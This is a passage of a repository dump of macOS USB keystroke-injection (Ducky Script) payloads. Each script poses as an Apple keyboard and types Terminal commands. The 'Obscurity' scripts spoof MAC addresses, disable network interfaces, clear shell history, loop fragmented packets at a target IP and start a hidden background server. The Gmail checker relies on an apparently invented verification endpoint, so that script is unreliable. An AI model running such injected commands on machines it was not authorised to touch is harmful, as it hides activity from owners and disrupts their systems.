| DELAY 500 21 | STRING git add . 22 | ENTER 23 | DELAY 2000 24 | STRING git commit -am "Auto-updated repository" 25 | ENTER 26 | DELAY 1000 27 | STRING git push 28 | ENTER 29 | DELAY 4000 30 | GUI w -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Gmail Address Generator.txt: -------------------------------------------------------------------------------- 1 | REM This script generates a random Gmail address and checks its availability. 2 | REM It displays the generated email and whether it's available or not. 3 | 4 | REM While this method can provide a reasonable indication of email availability, it's not guaranteed to be 100% accurate. 5 | 6 | REM Author: Narsty 7 | REM Title: Gmail Address Generator 8 | REM Category: GOODUSB 9 | REM Version: 2.0 10 | 11 | 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | DELAY 500 15 | GUI SPACE 16 | DELAY 500 17 | STRING Terminal 18 | DELAY 1000 19 | ENTER 20 | DELAY 1000 21 | STRING EMAIL=$(cat /dev/urandom | LC_ALL=C tr -dc 'a-zA-Z0-9' | fold -w 10 | head -n 1)@gmail.com; clear; echo "Generated email: $EMAIL"; echo "Checking email availability..."; RESPONSE=$(curl -s "https://mail.google.com/verify?email=$EMAIL"); if [[ $RESPONSE == *"The email address you entered is not available."* ]]; then echo "Email is not available"; else echo "Email is available"; fi 22 | DELAY 1000 23 | ENTER 24 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Homebrew Manager - Streamline Your macOS Package Updates.txt: -------------------------------------------------------------------------------- 1 | REM opens the Terminal application and runs a series of commands 2 | REM to update, upgrade, and clean up Homebrew packages. 3 | 4 | REM Title: Homebrew Manager 5 | REM Author: Narsty 6 | REM Version 1.0 MacOs 7 | REM Category: GOODUSB 8 | 9 | 10 | ID 05ac:021e Apple:Keyboard 11 | DELAY 500 12 | GUI SPACE 13 | DELAY 500 14 | STRING terminal 15 | DELAY 500 16 | ENTER 17 | DELAY 1000 18 | STRING brew update && brew upgrade && brew cleanup && brew autoremove 19 | DELAY 1000 20 | ENTER 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Htop Digital Dashboard.txt: -------------------------------------------------------------------------------- 1 | REM System monitoring dashboard 2 | REM shows Memory and Swap, Task, Uptime, and Processes. 3 | REM When you run this, you'll get a dynamic, colorful dashboard that can be fine tuned to your liking. 4 | REM Showing your system's real-time statistics. 5 | REM It's a practical use of the terminal's capabilities, and it's also visually impressive. 6 | 7 | REM Requirmetns: Homebrew and HTOP can install using command 'Brew install vtop' 8 | 9 | REM Title: HTOP Digital Dashboard 10 | REM Author: Narsty 11 | REM Target: MacOS 12 | REM Version: 1.0 13 | REM Category: GOODUSB 14 | 15 | ID 05ac:021e Apple:Keyboard 16 | DELAY 500 17 | GUI SPACE 18 | DELAY 500 19 | STRING Terminal 20 | DELAY 1000 21 | ENTER 22 | DELAY 500 23 | GUI-CTRL f 24 | DELAY 2000 25 | STRING htop 26 | ENTER 27 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/MacOS ScreenShot.txt: -------------------------------------------------------------------------------- 1 | REM Takes a Screenshot and saves the image to the desktop 2 | 3 | REM Title: MacOS ScreenShot 4 | REM Author: Narsty 5 | REM Target: MacOS 6 | REM Version: 1.0 7 | REM Category: GOODUSB 8 | 9 | 10 | ID 05ac:021e Apple:Keyboard 11 | DELAY 2000 12 | GUI SPACE 13 | DELAY 500 14 | STRING terminal 15 | DELAY 500 16 | ENTER 17 | DELAY 500 18 | STRING echo "USB Script Utility" 19 | ENTER 20 | DELAY 500 21 | STRING echo "-------------------" 22 | ENTER 23 | DELAY 500 24 | STRING echo "Capturing Screenshot..." 25 | ENTER 26 | DELAY 500 27 | STRING screencapture -W ~/Desktop/screenshot.png 28 | ENTER 29 | DELAY 1000 30 | STRING echo "Screenshot captured and saved to Desktop!" 31 | ENTER 32 | DELAY 500 33 | STRING echo "-------------------" 34 | ENTER 35 | DELAY 2000 36 | GUI q 37 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/MacUpdaterBot+.txt: -------------------------------------------------------------------------------- 1 | REM Must have Homebrew (shows progress bar on updates in the terminal) 2 | REM first install pv using Homebrew (brew install pv). 3 | 4 | REM Runs the software update command and pipes its output to pv. 5 | REM The pv command will display the progress bar or bars for the updates 6 | 7 | 8 | REM Author: Narsty 9 | REM Title: MacUpdaterBot+ 10 | REM Target: MacOS 11 | REM Version: 1.0 12 | REM Category: GOODUSB 13 | 14 | ID 05ac:021e Apple:Keyboard 15 | DELAY 500 16 | GUI SPACE 17 | DELAY 500 18 | STRING terminal 19 | DELAY 500 20 | ENTER 21 | DELAY 1000 22 | STRING softwareupdate -ia --verbose 2>&1 | pv -l -s "$(softwareupdate -l | wc -l)" -p -t -i 1 23 | DELAY 1000 24 | ENTER 25 | 26 | 27 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/MacUpdaterBot.txt: -------------------------------------------------------------------------------- 1 | REM Checks for and installs available updates on the MacOs system 2 | REM Very handy if you do not enjoy manually updating your system often! 3 | 4 | REM Note that running software updates with administrative privileges 5 | REM can affect system files, so exercise caution 6 | REM ensure that you have the necessary permissions to perform the updates. 7 | 8 | REM Author: Narsty 9 | REM Title: MacUpdaterBot 10 | REM Target: MacOS 11 | REM Version: 1.0 12 | REM Category: GOODUSB 13 | 14 | 15 | ID 05ac:021e Apple:Keyboard 16 | DELAY 500 17 | GUI SPACE 18 | DELAY 500 19 | STRING terminal 20 | DELAY 500 21 | ENTER 22 | DELAY 1000 23 | STRING sudo softwareupdate -ia --verbose 24 | DELAY 1000 25 | ENTER 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Password Generator.txt: -------------------------------------------------------------------------------- 1 | REM This script automates the process of generating 2 | REM a strong and secure password on macOS. 3 | 4 | REM Title: Password Generator 5 | REM Author: Narsty 6 | REM Target: MacOS 7 | REM Version: 1.0 8 | REM Category: GOODUSB 9 | 10 | 11 | ID 05ac:021e Apple:Keyboard 12 | DELAY 2000 13 | GUI SPACE 14 | DELAY 500 15 | STRING terminal 16 | DELAY 500 17 | ENTER 18 | DELAY 500 19 | STRING echo "Generating Password..." 20 | ENTER 21 | DELAY 500 22 | STRING password=$(openssl rand -base64 12) 23 | ENTER 24 | DELAY 500 25 | STRING osascript -e 'tell app "System Events" to display dialog "Generated Password:\n\n'"$password"'" with title "Generated Password" buttons {"OK"} default button 1 with icon note' 26 | ENTER 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Quick Lock Screen.txt: -------------------------------------------------------------------------------- 1 | REM Locks the screen on macOS 2 | REM Provides a quick way to secure your computer when stepping away 3 | REM Ensures privacy and data protection 4 | 5 | 6 | REM Title: Quick Lock Screen 7 | REM Author: Narsty 8 | REM Target: MacOS 9 | REM Version: 1.0 10 | REM Category: GOODUSB 11 | 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | DELAY 2000 15 | GUI SPACE 16 | DELAY 500 17 | STRING terminal 18 | DELAY 500 19 | ENTER 20 | DELAY 500 21 | STRING echo "Locking Screen..." 22 | ENTER 23 | DELAY 500 24 | GUI-CTRL q 25 | ENTER 26 | DELAY 1000 27 | 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Toggle Wifi.txt: -------------------------------------------------------------------------------- 1 | REM Toggle Wifi 2 | REM You'll need to STOP the Script after you see the wifi turn off (about 4 seconds) 3 | REM To turn the wifi Back On let the script run all the way through 4 | 5 | REM Title: Toggle Wifi 6 | REM Author: Narsty 7 | REM Target: MacOS 8 | REM Version: 1.0 9 | REM Category: GOODUSB 10 | 11 | 12 | 13 | ID 05ac:021e Apple:Keyboard 14 | DELAY 2000 15 | GUI SPACE 16 | DELAY 500 17 | STRING terminal 18 | DELAY 500 19 | ENTER 20 | DELAY 500 21 | STRING echo "Toggling Wi-Fi..." 22 | ENTER 23 | DELAY 500 24 | STRING networksetup -setairportpower en0 off 25 | ENTER 26 | DELAY 4000 27 | STRING networksetup -setairportpower en0 on 28 | ENTER 29 | DELAY 500 30 | GUI q 31 | DELAY 500 32 | ENTER 33 | 34 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Vtop Enhanced Dashboard.txt: -------------------------------------------------------------------------------- 1 | REM System monitoring dashboard 2 | REM shows CPU usage, memory, and network stats, as well as disk usage. 3 | REM When you run this, you'll get a dynamic, colorful dashboard 4 | REM showing your system's real-time statistics. 5 | REM It's a practical use of the terminal's capabilities, and it's also visually impressive. 6 | 7 | REM Requirmetns: Homebrew and VTOP can install using command 'Brew install vtop' 8 | 9 | REM Title: VTOP Enhanced Dashboard 10 | REM Author: Narsty 11 | REM Target: MacOS 12 | REM Version: 1.0 13 | REM Category: GOODUSB 14 | 15 | ID 05ac:021e Apple:Keyboard 16 | DELAY 500 17 | GUI SPACE 18 | DELAY 500 19 | STRING Terminal 20 | DELAY 1000 21 | ENTER 22 | DELAY 500 23 | GUI-CTRL f 24 | DELAY 2000 25 | STRING vtop 26 | ENTER 27 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/WIndow Organizer.txt: -------------------------------------------------------------------------------- 1 | REM Ducky Script to resize and arrange windows on macOS 2 | 3 | REM Title: WIndow Organizer 4 | REM Author: Narsty 5 | REM Target: MacOS 6 | REM Version: 1.0 7 | REM Category: GOODUSB 8 | 9 | 10 | ID 05ac:021e Apple:Keyboard 11 | DELAY 2000 12 | GUI SPACE 13 | DELAY 500 14 | STRING Terminal 15 | DELAY 500 16 | ENTER 17 | DELAY 1000 18 | STRING osascript -e 'tell application "Terminal" to set bounds of window 1 to {0, 0, 600, 400}' 19 | ENTER 20 | DELAY 1000 21 | STRING osascript -e 'tell application "Google Chrome" to set bounds of window 1 to {600, 0, 1200, 400}' 22 | ENTER 23 | DELAY 1000 24 | STRING osascript -e 'tell application "Finder" to set bounds of window 1 to {0, 400, 600, 800}' 25 | ENTER 26 | DELAY 1000 27 | STRING osascript -e 'tell application "TextEdit" to set bounds of window 1 to {600, 400, 1200, 800}' 28 | ENTER 29 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Goodusb/Weather Check.txt: -------------------------------------------------------------------------------- 1 | REM Easily check the weather with the click of a button 2 | REM Can change the location by replacing "NETHERLANDS" with your location 3 | 4 | 5 | REM TITLE: Weather Check 6 | REM Author: Narsty 7 | REM Version:1.0 8 | REM Category: GOODUSB 9 | 10 | 11 | DELAY 500 12 | GUI SPACE 13 | DELAY 500 14 | STRING TERMINAL 15 | DELAY 1000 16 | ENTER 17 | DELAY 500 18 | STRING CURL WTTR.IN/NETHERLANDS 19 | DELAY 500 20 | ENTER 21 | DELAY 500 22 | GUI-CTRL F 23 | 24 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/DarkNet Angel Restore.txt: -------------------------------------------------------------------------------- 1 | REM Restores the original MAC address. 2 | REM removes the DNS configuration. 3 | REM disables firewall stealth mode. 4 | REM and disengages the cloaking device. 5 | REM 7 seconds to enter password 6 | 7 | 8 | REM Run ifconfig en0 in the terminal to get your original MAC address 9 | REM It will be displayed in the format xx:xx:xx:xx:xx:xx. 10 | REM Replace in the script with the actual MAC address you obtained. 11 | 12 | 13 | REM Author: Narsty 14 | REM Title: DarkNet Angel Restore 15 | REM Target: MacOS 16 | REM Version: 1.0 17 | REM Category: Obscurity 18 | 19 | ID 05ac:021e Apple:Keyboard 20 | DELAY 1000 21 | GUI SPACE 22 | DELAY 500 23 | STRING terminal 24 | DELAY 500 25 | ENTER 26 | DELAY 500 27 | STRING sudo ifconfig en0 ether Original_mac_address 28 | ENTER 29 | DELAY 7000 30 | STRING sudo rm /etc/resolver/local 31 | ENTER 32 | DELAY 2000 33 | STRING sudo defaults write /Library/Preferences/com.apple.alf stealthenabled -bool false 34 | ENTER 35 | DELAY 2000 36 | STRING sudo sysctl -w net.inet.tcp.rfc6298valtso=1 37 | ENTER 38 | DELAY 2000 39 | STRING exit 40 | ENTER 41 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/DarkNet Angel.txt: -------------------------------------------------------------------------------- 1 | REM spoofs the MAC address 2 | REM randomizes DNS requests 3 | REM enables firewall stealth mode 4 | REM and engages the cloaking device 5 | REM 7 seconds to enter password 6 | 7 | 8 | REM Open the Terminal application on your macOS. 9 | REM Run the following command: sudo mkdir /etc/resolver 10 | REM This will create the /etc/resolver directory needed to randomize DNS request. 11 | 12 | REM Author: Narsty 13 | REM Title: DarkNet Angel 14 | REM Target: MacOS 15 | REM Version: 1.0 16 | REM Category: Obscurity 17 | 18 | 19 | ID 05ac:021e Apple:Keyboard 20 | DELAY 1000 21 | GUI SPACE 22 | DELAY 500 23 | STRING terminal 24 | DELAY 500 25 | ENTER 26 | DELAY 1000 27 | STRING sudo ifconfig en0 ether 00:11:22:33:44:55 28 | ENTER 29 | DELAY 7000 30 | STRING sudo sh -c 'echo "nameserver 127.0.0.1" > /etc/resolver/local' 31 | ENTER 32 | DELAY 2000 33 | STRING sudo defaults write /Library/Preferences/com.apple.alf stealthenabled -bool true 34 | ENTER 35 | DELAY 2000 36 | STRING sudo sysctl -w net.inet.tcp.rfc6298valtso=0 37 | ENTER 38 | DELAY 2000 39 | STRING exit 40 | ENTER 41 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/File Encryption.txt: -------------------------------------------------------------------------------- 1 | REM This script encrypts a file of your choice on the desktop (can change path) 2 | REM The encrypted file will be named "ENCRYPTED.enc" 3 | REM then it removes the original file. 4 | 5 | REM Replace "< >" with the correct file name & choose any password you'd like. 6 | REM Must include file type in the file name. Example (.pdf .txt .doc .mp4) 7 | 8 | 9 | REM To decrypt the file and return it to its original state enter the command below 10 | REM Must include file type in the name. Example (.pdf .txt .doc) 11 | REM password must be the same as when you encrypted 12 | 13 | 14 | REM openssl enc -aes-256-cbc -d -in ~/Desktop/ENCRYPTED.enc -out ~/Desktop/ -pass pass: 15 | 16 | 17 | REM Title: File Encryption 18 | REM Author: Narsty 19 | REM Target: MacOS 20 | REM Version: 1.0 21 | REM Category: Obscurity 22 | 23 | DELAY 500 24 | GUI space 25 | DELAY 500 26 | STRING terminal 27 | DELAY 1000 28 | ENTER 29 | DELAY 500 30 | STRING openssl enc -aes-256-cbc -salt -in ~/Desktop/ -out ~/Desktop/ENCRYPTED.enc -pass pass: 31 | ENTER 32 | DELAY 500 33 | STRING rm ~/Desktop/ 34 | DELAY 1000 35 | ENTER 36 | DELAY 250 37 | GUI w 38 | 39 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/Fragmentation Traffic Generator.txt: -------------------------------------------------------------------------------- 1 | REM This script sets up a network fragmentation technique using Scapy. 2 | REM It generates ICMP packets with a randomized payload length and performs fragmentation. 3 | REM The payload is created by randomly selecting printable ASCII characters within a specific range. 4 | REM The script constructs an IP packet with the specified destination IP address and ICMP payload. 5 | REM It then fragments the packet into smaller fragments using a fragment size of 200 bytes. 6 | REM The fragmented packets are sent with a delay of 0.1 seconds between each fragment. 7 | REM The script continuously loops and sends the fragments to simulate fragmented network traffic. 8 | 9 | REM Network fragmentation can introduce complexity 10 | REM and potential challenges for packet inspection and reassembly. 11 | REM This technique aims to add an additional layer of obfuscation 12 | REM to the network traffic by breaking it into smaller fragments. 13 | REM However, it does not guarantee complete anonymity or provide absolute security. 14 | 15 | REM Adjust the range values in the payload generation 16 | REM to control the length of the randomized payload. 17 | REM The current range is set to generate payloads between 500 and 1500 characters. 18 | REM Modify destination IP address in the 'IP(dst="10.0.0.1")' section to match your desired target. 19 | REM Modify the fragment size (fragsize) and the delay between fragments (inter) as needed for your testing purposes. 20 | 21 | 22 | REM Requirements: Python 3 and Scapy. You can install Scapy using the command 'pip3 install scapy'. 23 | 24 | REM Author: Narsty 25 | REM Title: Fragmentation Traffic Generator 26 | REM Target: MacOS 27 | REM Version: 1.0 28 | REM Category: Obscurity 29 | 30 | ID 05ac:021e Apple:Keyboard 31 | DELAY 500 32 | GUI SPACE 33 | DELAY 500 34 | STRING Terminal 35 | DELAY 1000 36 | ENTER 37 | DELAY 500 38 | STRING python3 -c 'import random; from scapy.all import *; payload = "".join(chr(random.randint(32, 126)) for _ in range(random.randint(500, 1500))); packet = IP(dst="10.0.0.1") / ICMP() / payload; fragments = fragment(packet, fragsize=200); send(fragments, inter=0.1, loop=True)' 39 | DELAY 500 40 | ENTER 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/MacCloak Reverse.txt: -------------------------------------------------------------------------------- 1 | REM restore the network settings and visibility. 2 | REM Reverses the commands in MacCloak: Untraceable 3 | 4 | REM replace with the original hostname of your system. 5 | 6 | REM Author: Narsty 7 | REM Title: MacCloak/Reverse 8 | REM Target: MacOS 9 | REM Version: 1.0 10 | REM Category: Obscurity 11 | 12 | 13 | 14 | ID 05ac:021e Apple:Keyboard 15 | DELAY 1000 16 | GUI SPACE 17 | DELAY 500 18 | STRING terminal 19 | DELAY 500 20 | ENTER 21 | DELAY 1000 22 | STRING sudo dscacheutil -flushcache 23 | ENTER 24 | DELAY 500 25 | STRING defaults write com.apple.Safari CustomUserAgent "\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36\"" 26 | ENTER 27 | DELAY 500 28 | STRING sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool true 29 | ENTER 30 | DELAY 500 31 | STRING defaults write com.apple.Safari PrivateBrowsingEnabled -bool false 32 | ENTER 33 | DELAY 500 34 | STRING defaults write com.apple.Siri SuggestionsEnabled -bool true 35 | ENTER 36 | DELAY 500 37 | STRING sudo scutil --set HostName 38 | ENTER 39 | DELAY 500 40 | STRING open /Applications/Safari.app 41 | ENTER 42 | DELAY 5000 43 | STRING history -c 44 | ENTER 45 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/MacCloak.txt: -------------------------------------------------------------------------------- 1 | REM Clear DNS Cach 2 | REM Randomize User Agent 3 | REM Disable Location Services 4 | REM Clear Browsing History 5 | REM Enable Private Browsing Mode 6 | REM Disable Siri Suggestions 7 | REM Randomize Hostname 8 | REM Clear Terminal History 9 | REM Open Tor Browser 10 | 11 | REM Please note that some commands may require administrative privileges (sudo). 12 | REM Replace with a random hostname of your choice. 13 | 14 | REM Author: Narsty 15 | REM Title: MacCloak: Untraceable 16 | REM Target: MacOS 17 | REM Version: 1.0 18 | REM Category: Obscurity 19 | 20 | 21 | ID 05ac:021e Apple:Keyboard 22 | DELAY 1000 23 | GUI SPACE 24 | DELAY 500 25 | STRING terminal 26 | DELAY 500 27 | ENTER 28 | DELAY 1000 29 | STRING sudo dscacheutil -flushcache 30 | DELAY 7000 31 | ENTER 32 | DELAY 500 33 | STRING defaults write com.apple.Safari CustomUserAgent "\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"" 34 | DELAY 500 35 | ENTER 36 | DELAY 500 37 | STRING sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool false 38 | ENTER 39 | DELAY 500 40 | STRING rm -rf ~/Library/Caches/com.apple.Safari/ 41 | ENTER 42 | DELAY 500 43 | STRING defaults write com.apple.Safari PrivateBrowsingEnabled -bool true 44 | ENTER 45 | DELAY 500 46 | STRING defaults write com.apple.Siri SuggestionsEnabled -bool false 47 | ENTER 48 | DELAY 500 49 | STRING sudo scutil --set HostName 50 | ENTER 51 | DELAY 500 52 | STRING open /Applications/TorBrowser.app 53 | ENTER 54 | DELAY 5000 55 | STRING history -c 56 | ENTER 57 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/MacNetGhost.txt: -------------------------------------------------------------------------------- 1 | REM Ducky Script for Network Obscurity and Disabling Interfaces 2 | 3 | REM Author: Narsty 4 | REM Title: MacNetGhost 5 | REM Target: MacOS 6 | REM Version: 1.0 7 | REM Category: Obscurity 8 | 9 | 10 | ID 05ac:021e Apple:Keyboard 11 | DELAY 1000 12 | GUI SPACE 13 | DELAY 500 14 | STRING terminal 15 | DELAY 500 16 | ENTER 17 | DELAY 1000 18 | STRING sudo ifconfig en0 down 19 | ENTER 20 | DELAY 7000 21 | STRING sudo ifconfig en1 down 22 | ENTER 23 | DELAY 500 24 | STRING sudo ifconfig en2 down 25 | ENTER 26 | DELAY 500 27 | STRING sudo ifconfig en3 down 28 | ENTER 29 | DELAY 500 30 | STRING sudo ifconfig en4 down 31 | ENTER 32 | DELAY 500 33 | STRING sudo ifconfig en5 down 34 | ENTER 35 | DELAY 500 36 | STRING sudo ifconfig en6 down 37 | ENTER 38 | DELAY 500 39 | STRING sudo ifconfig en7 down 40 | ENTER 41 | DELAY 500 42 | STRING sudo ifconfig en8 down 43 | ENTER 44 | DELAY 500 45 | STRING sudo ifconfig en9 down 46 | ENTER 47 | DELAY 1000 48 | STRING exit 49 | ENTER 50 | 51 | 52 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/MacNetGhostRestore.txt: -------------------------------------------------------------------------------- 1 | REM Ducky Script to Restore Disabled Network Interfaces 2 | 3 | REM Author: Narsty 4 | REM Title: MacNetGhostRestore 5 | REM Target: MacOS 6 | REM Version: 1.0 7 | REM Category: Obscurity 8 | 9 | 10 | ID 05ac:021e Apple:Keyboard 11 | DELAY 1000 12 | GUI SPACE 13 | DELAY 500 14 | STRING terminal 15 | DELAY 500 16 | ENTER 17 | DELAY 1000 18 | STRING sudo ifconfig en0 up 19 | ENTER 20 | DELAY 7000 21 | STRING sudo ifconfig en1 up 22 | ENTER 23 | DELAY 500 24 | STRING sudo ifconfig en2 up 25 | ENTER 26 | DELAY 500 27 | STRING sudo ifconfig en3 up 28 | ENTER 29 | DELAY 500 30 | STRING sudo ifconfig en4 up 31 | ENTER 32 | DELAY 500 33 | STRING sudo ifconfig en5 up 34 | ENTER 35 | DELAY 500 36 | STRING sudo ifconfig en6 up 37 | ENTER 38 | DELAY 500 39 | STRING sudo ifconfig en7 up 40 | ENTER 41 | DELAY 500 42 | STRING sudo ifconfig en8 up 43 | ENTER 44 | DELAY 500 45 | STRING sudo ifconfig en9 up 46 | ENTER 47 | DELAY 1000 48 | STRING exit 49 | ENTER 50 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/Network Padding Fury.txt: -------------------------------------------------------------------------------- 1 | REM This script sets up a network padding technique. 2 | REM Using Scapy to send padded IP packets with random payload length. 3 | REM Each packet is padded with a random number of 'A' characters to obfuscate the payload. 4 | REM This helps to add padding to the network traffic and increase the overall packet size. 5 | REM Keep in mind that while network padding can add some level of privacy, 6 | REM it doesn't guarantee complete anonymity or security. 7 | 8 | REM By default, it sends 600 packets with random payload length and padding. 9 | REM Current script runs for about 5 minutes 10 | REM Change the range value in the 'send([packet] * 600)' line 33 11 | REM For example, changing it to 'send([packet] * 1200)' will last about 10 minutes. 12 | REM Adjust the inter parameter to control the delay between each packet. 13 | REM The current value is set to 0.5 seconds, but you can modify it as needed for your testing purposes. 14 | 15 | REM Requirements: Python 3 and Scapy. You can install Scapy using the command 'pip3 install scapy'. 16 | REM warnings can be ignored as they indicate that no IPv4 address is currently assigned to those interfaces. 17 | REM The script will continue to function as intended 18 | 19 | REM Author: Narsty 20 | REM Title: Network Padding Fury 21 | REM Target: MacOS 22 | REM Version: 1.0 23 | REM Category: Obscurity 24 | 25 | ID 05ac:021e Apple:Keyboard 26 | DELAY 500 27 | GUI SPACE 28 | DELAY 500 29 | STRING Terminal 30 | DELAY 1000 31 | ENTER 32 | DELAY 500 33 | STRING python3 -c 'import random, time; from scapy.all import *; packet = IP() / Padding(load="A" * random.randint(100, 200)); send([packet] * 600, inter=0.5)' 34 | ENTER 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/Shadowsocks Proxy Ninja Reverse.txt: -------------------------------------------------------------------------------- 1 | REM Disabling Shadowsocks and Proxy Server 2 | REM These commands disable the system-level proxy settings & stop the Shadowsocks service 3 | REM Adjust this command based on how you started the service 4 | 5 | REM you can use the ps command in the terminal to check if the Shadowsocks process is running. 6 | REM command 'ps -ef | grep shadowsocks' 7 | REM you can also kill the PID to end the Shadowsocks Process 8 | 9 | 10 | 11 | REM Author: Narsty 12 | REM Title: Shadowsocks Proxy Ninja Reverse 13 | REM Target: MacOS 14 | REM Version: 1.0 15 | REM Category: Obscurity 16 | 17 | ID 05ac:021e Apple:Keyboard 18 | DELAY 500 19 | GUI SPACE 20 | DELAY 500 21 | STRING Terminal 22 | DELAY 500 23 | ENTER 24 | DELAY 1000 25 | STRING brew services stop shadowsocks-libev 26 | ENTER 27 | DELAY 3000 28 | STRING networksetup -setsocksfirewallproxystate Wi-Fi off 29 | ENTER 30 | DELAY 3000 31 | 32 | 33 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/Shadowsocks Proxy Ninja.txt: -------------------------------------------------------------------------------- 1 | REM Shadowsocks encrypts your network traffic and routes it through the proxy server 2 | REM making it difficult for third parties to analyze or decipher your data. 3 | REM This can help protect your network traffic from being easily monitored or intercepted. 4 | 5 | REM Requirements: Shadowsocks can be installed using command 'brew install shadowsocks-libev' 6 | 7 | REM you can use the ps command in the terminal to check if the Shadowsocks process is running. 8 | REM command 'ps -ef | grep shadowsocks' 9 | 10 | 11 | 12 | REM Author: Narsty 13 | REM Title: Shadowsocks Proxy Ninja 14 | REM Target: MacOS 15 | REM Version: 1.0 16 | REM Category: Obscurity 17 | 18 | ID 05ac:021e Apple:Keyboard 19 | DELAY 500 20 | GUI SPACE 21 | DELAY 500 22 | STRING Terminal 23 | DELAY 1000 24 | ENTER 25 | DELAY 1000 26 | STRING brew services start shadowsocks-libev 27 | ENTER 28 | DELAY 5000 29 | STRING networksetup -setsocksfirewallproxy Wi-Fi 127.0.0.1 1080 30 | ENTER 31 | DELAY 250 32 | 33 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/Shadowsocks Tor Proxy Reverse.txt: -------------------------------------------------------------------------------- 1 | REM Returns your wifi network back to normal. 2 | REM Must use the Kill command with the PID number to end tor 'Kill PID#' 3 | 4 | 5 | REM You can use the ps command in the terminal to check if the Shadowsocks 6 | REM and Tor processes are running. 7 | REM Command to check Shadowsocks: 'ps -ef | grep shadowsocks' 8 | REM Command to check Tor: 'ps -ef | grep tor' 9 | 10 | 11 | REM Author: Narsty 12 | REM Title: Shadowsocks Tor Proxy Reverse 13 | REM Target: MacOS 14 | REM Version: 1.0 15 | REM Category: Obscurity 16 | 17 | ID 05ac:021e Apple:Keyboard 18 | DELAY 500 19 | GUI SPACE 20 | DELAY 500 21 | STRING Terminal 22 | DELAY 1000 23 | ENTER 24 | DELAY 1000 25 | STRING networksetup -setsocksfirewallproxystate Wi-Fi off 26 | ENTER 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/Shadowsocks Tor Proxy.txt: -------------------------------------------------------------------------------- 1 | REM This script sets up a Shadowsocks Tor Proxy on your Mac 2 | REM Encrypts your network traffic and routes it through the Tor network. 3 | REM By combining the encryption of Shadowsocks with the anonymity of Tor. 4 | REM This setup enhances your online privacy and security. 5 | 6 | REM Requirements: Install Shadowsocks by running 'brew install shadowsocks-libev' 7 | REM Requirements: Install Tor by running 'brew install tor' 8 | 9 | REM You can use the ps command in the terminal to check if the Shadowsocks 10 | REM and Tor processes are running. 11 | REM Command to check Shadowsocks: 'ps -ef | grep shadowsocks' 12 | REM Command to check Tor: 'ps -ef | grep tor' 13 | 14 | 15 | 16 | REM Author: Narsty 17 | REM Title: Shadowsocks Tor Proxy 18 | REM Target: MacOS 19 | REM Version: 1.0 20 | REM Category: Obscurity 21 | 22 | ID 05ac:021e Apple:Keyboard 23 | DELAY 500 24 | GUI SPACE 25 | DELAY 500 26 | STRING Terminal 27 | DELAY 1000 28 | ENTER 29 | DELAY 1000 30 | STRING networksetup -setsocksfirewallproxy Wi-Fi 127.0.0.1 9050 31 | ENTER 32 | DELAY 250 33 | 34 | -------------------------------------------------------------------------------- /SD-Card/Ducky Script/Mac/Obscurity/Silent Server Creator.txt: -------------------------------------------------------------------------------- 1 | REM Script that uses obfuscation to stealthily create a local HTTP server 2 | REM hosting a simple web page on the machine. 3 | REM access the server by opening a web browser and navigating to localhost:9090 4 | 5 | 6 | 7 | REM Creates a new directory in the tmp folder named "ghost_server" 8 | REM Creates a new HTML file named "index.html" with the message "Hello, this is the Silent Server!". 9 | REM Starts a http.server server using Python's built-in SimpleHTTPServer module on port 9090. 10 | REM The nohup command allows the server to continue running even after the terminal is closed 11 | REM the output is redirected to /dev/null so that it doesn't appear in the terminal. 12 | 13 | REM Author: Narsty 14 | REM Title: Silent Server Creator 15 | REM Target: MacOS 16 | REM Version: 1.0 17 | REM Category: Obscurity 18 | 19 | ID 05ac:021e Apple:Keyboard 20 | DELAY 500 21 | GUI SPACE 22 | DELAY 500 23 | STRING Terminal 24 | DELAY 500 25 | ENTER 26 | DELAY 500 27 | STRING mkdir /tmp/ghost_server && cd /tmp/ghost_server 28 | ENTER 29 | DELAY 500 30 | STRING echo '

Hello, this is the Phantom Server!

